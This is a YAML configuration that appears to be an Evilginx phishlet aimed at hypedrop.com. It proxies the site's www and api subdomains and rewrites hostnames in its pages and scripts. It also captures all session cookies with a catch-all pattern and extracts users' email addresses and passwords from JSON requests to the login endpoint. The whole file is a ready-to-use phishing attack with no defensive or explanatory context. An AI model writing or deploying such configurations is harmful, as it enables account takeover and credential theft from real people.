min_ver: '2.3.0'
proxy_hosts:
  - {phish_sub: 'www', orig_sub: 'www', domain: 'hypedrop.com', session: true, is_landing: true}
  - {phish_sub: 'api', orig_sub: 'api', domain: 'hypedrop.com', session: true}
  - {phish_sub: 'xxx', orig_sub: 'www', domain: 'google.com'}
sub_filters:
  - {triggers_on: 'www.hypedrop.com', orig_sub: 'www', domain: 'hypedrop.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
auth_tokens:
  - domain: '.hypedrop.com'
    keys: ['.*,regexp']
auth_urls:
  - '/auth/local'
credentials:
  username:
    key: ''
    search: '"email":"([^"]*)'
    type: 'json'
  password:
    key: ''
    search: '"password":"([^"]*)'
    type: 'json'
login:
  domain: 'www.hypedrop.com'
  path: '/en/login'